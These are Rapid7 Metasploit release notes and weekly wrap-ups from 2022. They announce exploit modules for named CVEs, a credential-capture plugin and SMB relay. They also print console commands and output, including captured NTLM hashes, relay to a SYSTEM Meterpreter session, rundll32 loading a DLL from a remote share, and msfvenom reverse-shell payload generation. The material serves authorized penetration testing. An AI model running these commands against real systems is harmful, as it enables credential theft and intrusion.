  • VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954: This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.
  • Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525: This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user. The vulnerability was discovered by Rapid7 researcher Jake Baines.

Local Privilege Escalation

Capture plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, a new capture plugin can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.

After running the load capture command, the captureg command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.

In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.123.128
Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt
Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs

Opening a new terminal in conjunction with the tail command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:

$ tail -f  ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.136
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000

It is also possible to log directly to stdout without using the tail command:

captureg start --ip 192.168.123.128 --stdout

SMB v3 server support

This work builds upon the SMB v3 client support added in Metasploit 6.0.

Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point

This can be useful for copying files onto remote targets, or for running remote DLLs:

copy \\192.168.123.1\home\example.txt .
rundll32.exe \\192.168.123.1\home\example.dll,0

All remaining Metasploit modules have now been updated to support SMB v3. Some examples:

  • exploit/windows/smb/smb_delivery: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as rundll32.exe \\192.168.123.128\tHKPx\WeHnu,0
  • exploit/windows/smb/capture: This module creates a mock SMB server that accepts credentials before returning NT_STATUS_LOGON_FAILURE. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking
  • exploit/windows/dcerpc/cve_2021_1675_printnightmare: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
  • exploit/windows/smb/smb_relay: Covered in more detail below.

Enhanced SMB relay support

The windows/smb/smb_relay has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.

Improved pivoting / NATed services support

Metasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on — in this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

# Set where the target connects to Metasploit. ListenerBindAddress is a new option.
set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

# Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.
set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26

Debugging Meterpreter sessions

There are now two ways to debug Meterpreter sessions:

  1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
  2. Generate a custom Meterpreter debug build with extra logging present

Log Meterpreter TLV packets

This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:

msf6 > setg SessionTlvLogging true
SessionTlvLogging => true

Here’s an example of logging the network traffic when running the getenv Meterpreter command:

meterpreter > getenv USER

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP       tlvs=[
    #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
    #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE       meta=STRING     value="demo_user">
  ]>
]>

Environment Variables
=====================

Variable  Value
--------  -----
USER      demo_user

Meterpreter debug builds

We have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set MeterpreterDebugBuild to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting MeterpreterDebugLogging to rpath:/tmp/meterpreter_log.txt.

For example, within msfconsole you can generate a new payload and create a handler:

use payload/python/meterpreter_reverse_tcp
generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false
to_handler

Running the payload will show the Meterpreter log output:

$ python3 shell.py
DEBUG:root:[*] running method core_negotiate_tlv_encryption
DEBUG:root:[*] Negotiating TLV encryption
DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001
DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966
DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46
DEBUG:root:[*] TLV encryption sorted
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_set_session_guid
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
... etc ...

For full details, see the Debugging Meterpreter Sessions documentation.

User-contributable docs

We have now released user-contributable documentation for Metasploit, available at https://docs.metasploit.com/. This new site provides a searchable source of information for multiple topics including:

Contributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the docs folder.

Local exploit suggester improvements

The post/multi/recon/local_exploit_suggester post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.

Now with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.

Upcoming roadmap work

In addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/06/03/metasploit-weekly-wrap-up-160/

Ask and you may receive

Metasploit Weekly Wrap-Up

Module suggestions for the win, this week we see a new module written by jheysel-r7 based on CVE-2022-26352 that happens to have been suggested by jvoisin in the issue queue last month. This module targets an arbitrary file upload in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7 to obtain shells. Make sure you have covered your bases for permission to target this vulnerability before testing this as one blog post suggests some banking sites may rely on this tool.

Everything comes full circle

As the GSoC 2022 program starts to ramp up, a contributor that participated in 2020, red0xff, contributed an enhancement to SQLi library support to give module writers a quicker path to injection on Microsoft SQL. The enhancement updates the auxiliary/gather/billquick_txtid_sqli module to showcase library utility and can reduce logic code required in modules significantly—saving about 20% in this one instance.

New module content (2)

  • DotCMS RCE via Arbitrary File Upload by Hussein Daher, Shubham Shah, and jheysel-r7, which exploits CVE-2022-26352 – Adds an exploit module that leverages CVE-2022-26352, an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7, that allows an attacker to execute arbitrary code remotely in the context of the user running the application. The module uploads a .jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
  • MyBB Admin Control Code Injection RCE by Altelus, Christophe De La Fuente, and Cillian Collins, which exploits CVE-2022-24734 – Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. Authentication to the MyBB Admin Control is required for this exploit to work and the account must have rights to add or update settings.

Enhancements and features (2)

  • #16435 from red0xff – This adds support for Microsoft SQL Server to the SQL injection library. Additionally, this updates the auxiliary/gather/billquick_txtid_sqli module to leverage the new library features for exploitation.
  • #16492 from h00die – Improves the nfs_mount scanner module by detecting if a NFS network share is mountable or not based on the provided IP address and hostname.

Bugs fixed (2)

  • #16621 from sjanusz-r7 – Fixes a bug where running multi/manage/shell_to_meterpreter to upgrade from a Python Meterpreter session to a Native Meterpreter session would kill the original Meterpreter session.
  • #16640 from zeroSteiner – A bug has been fixed where the Net::LDAP library would fail due to the socket returning less data than was requested. This was addressed by introducing a custom read() method to appropriately handle cases where the socket may return less data than was expected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/27/metasploit-weekly-wrap-up-158-2/

PetitPotam Improvements

Metasploit Weekly Wrap-Up

Metasploit’s Ruby support has been updated to allow anonymous authentication to SMB servers. This is notably useful while exploiting the PetitPotam vulnerability with Metasploit, which can be used to coerce a Domain Controller to send an authentication attempt over SMB to other machines via MS-EFSRPC methods:

msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10

[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:[email protected]_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:[email protected]_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Full details can be found in the Metasploit PetitPotam documentation.

Standalone SMB Server tool

Our very own Spencer McIntyre has added support for creating a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB 1/2/3, as well as encryption support for SMB3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point .

This can be useful for copying files onto remote targets, or running remote DLLs:

copy \\192.168.123.1\home\example.txt .

rundll32.exe \\192.168.123.1\home\example.dll,0

Local Exploit suggester improvements

The post/multi/recon/local_exploit_suggester module is a post-exploitation module which iterates through multiple relevant Metasploit modules and automatically checks for local vulnerabilities that may lead to privilege escalation.

This module has been updated with a number of bug fixes, as well as having the UX has been improved to more clearly highlight which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase – due to session platform/arch/type mismatches. This is useful for evaluating modules which may require manually migrating from a Shell session to Meterpreter, or from a Python Meterpreter to a Native Meterpreter to gain local privilege escalation etc.

New module content (1)

  • #16488 from cdelafuente-r7 – This updates the exploit/windows/local/vss_persistence and post/windows/manage/persistence_exe modules to optionally obfuscate scheduled tasks. Additionally, the post/windows/manage/persistence_exe was updated with a new "TASK" startup technique that allows users to obtain persistence via a scheduled task.

Enhancements and features (7)

  • #16413 from sjanusz-r7 – Updates the multi/recon/local_exploit_suggester with multiple enhancements, including the ability to correctly work with Java/Python Meterpreters as well as now generating a readable table of results.
  • #16481 from zeroSteiner – This updates the Msf::Exploit::Remote::SMB::Server::Share mixin to use RubySMB, which now supports SMB versions 1-3, along with various other features like accounting, state logging, session tracking, support for multiple files etc. All existing modules that were using this mixin will now automatically benefit from these improvements. They will work again against modern versions of Windows where SMBv1 has been disabled.
  • #16518 from adfoster-r7 – Merge Metasploit framework wiki into Metasploit framework.
  • #16600 from adfoster-r7 – Update docs site to use migrated wiki files.
  • #16610 from zeroSteiner – Updates the module windows/dcerpc/cve_2021_1675_printnightmare from being an auxiliary that would require the user to setup and configure an external Samba share to host the payload to an all-inclusive exploit. This means users can deliver their payloads in a seamless fashion without needing to deal with Samba.
  • #16620 from zeroSteiner – Adds a standalone tool for creating a read-only SMB 2/3 server from the current working directory. Usage: ruby ./tools/smb_file_server.rb. Normal SMB clients can then connect to this share and download files as normal. For instance via Windows with copy \\192.168.123.1\home\example.exe . or net use \\192.168.123.1\home /u:WORKGROUP\metasploit password

Bugs fixed (1)

  • #16619 from NikitaKovaljov – This fixes a bug in neighbor advertisement filtering as used by the auxiliary/scanner/discover/ipv6_neighbor module. Prior to this patch, the module would fail to map IPv4 to IPv6 addresses.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/05/20/metasploit-weekly-wrap-up-157/

Zyxel firewall unauthenticated command injection

Metasploit Weekly Wrap-Up

This week, our very own Jake Baines added an exploit module that leverages CVE-2022-30525, an unauthenticated remote command injection vulnerability in Zyxel firewalls with zero touch provisioning (ZTP) support. Jake is also the author of the original research and advisory that was published last week. This module allows an attacker to achieve arbitrary code execution as the nobody user on affected devices. It takes advantage of an unsanitized user input that feeds the python os.system method behind the scenes. Well done Jake!

SAML credentials generator for vCenter Server

Community contributor npm-cesium137-io added an auxiliary module that forges valid SAML credentials for vCenter server. These credentials are very useful since they can be used to gain access to the SSO domain as a vSphere administrator. Note that this module cannot run offline and must be executed while the target vCenter is reachable over the network to properly acquire the administrator session token. Also, the vCenter SSO Identity Provider (IdP) trusted certificate chain needs to be provided. This can be extracted manually from the vmdir database file at /storage/db/vmware-vmdir/data.mdb using binwalk or using this post module, which is still in review at the time of writing.

GSOC 2022

The Metasploit project was accepted again for the Google Summer of Code program. This year the team welcomes back pingport80 as a returning contributor and 3V3RYONE. These students will be working on Post API improvements and expanded HTTP-Trace support respectively. We look forward to mentoring and working with them in the coming months, so stay tuned for further updates as they get started!

New module content (3)

  • VMware vCenter Forge SAML Authentication Credentials by npm – This module forges valid SAML credentials for vCenter server using the vCenter SSO IdP certificate, IdP private key, and VMCA root certificate as input objects.
  • Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525 – A new module has been added to exploit CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user.
  • Bookmarked Sites Retriever by jerrelgordon – This adds a module to retrieve the bookmarks from Internet Explorer, Opera, Google Chrome, and Edge.

Enhancements and features (3)

  • #16430 from adfoster-r7 – This adds support for logging AS-REP Roastable accounts, as well as storing the generated Kerberos token within the creds database. Additionally improves error handling.
  • #16442 from sjanusz-r7 – This adds a new vars_form_data field to the Rex HTTP Client for uploading files/form values to a remote HTTP server with ease:
vars_form_data = [
  { 'name' => 'nsp', 'data' => @csrf_token },
  { 'name' => 'upload', 'data' => 1 },
  { 'name' => 'MAX_FILE_SIZE', 'data' => 1000000 },
  { 'name' => 'uploadedfile', 'data' => payload_zip, 'mime_type' => 'application/zip', 'encoding' => 'binary', 'filename' => zip_filename }
]

res = send_request_cgi(
  'method' => 'POST',
  'uri' => uri,
  'vars_form_data' => vars_form_data
)
  • #16555 from zeroSteiner – This moves a duplicated retry_until_truthy function into a centralized location for better reuse. This function is useful for retrying operations that may fail the first time, such as checking if Kubernetes containers are ready yet etc.

Bugs fixed (6)

  • #16487 from red0xff – This fixes a deprecation warning in the auxiliary/capture/server/mssql warning as well as outputting a valid John The Ripper format for offline password cracking
  • #16499 from adfoster-r7 – This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indicator (SNI) extension was in use.
  • #16505 from AdrianVollmer – This fixes an issue in the auxiliary/scanner/lotus/lotus_domino_hashes #dump_hashes parsing logic.
  • #16570 from ssst0n3 – This fixes a bug in the generation of aarch64 stagers so that when the stage is received and written to memory, the stage can execute in a lower-privileged process.
  • #16572 from zeroSteiner – A bug has been fixed whereby a PayloadSpaceViolation exception might be raised when the --smallest flag was used with msfvenom, due to msfvenom setting the space available to 0 instead of a positive number. The code should now appropriately account for this case.
  • #16588 from zeroSteiner – This adds a check to the two new Powershell adapter payload modules. The size check intends to ensure that payloads that are too large (like unstaged Meterpreters) are marked as incompatible.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/

Spring4Shell module

Metasploit Weekly Wrap-Up

Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.

F5 BIG-IP iControl RCE via REST Authentication Bypass module

In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root via the /mgmt/tm/util/bash endpoint.

Cisco RV340 SSL VPN RCE module

The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.

First Class PowerShell Command Payloads

Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell* payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.

Since these are new payload modules, they can also be generated directly using MSFVenom:

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

This is similar to using one of the psh- formatters with the existing -f option. However, because it’s a payload module, the additional Powershell specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true.

New module content (4)

  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
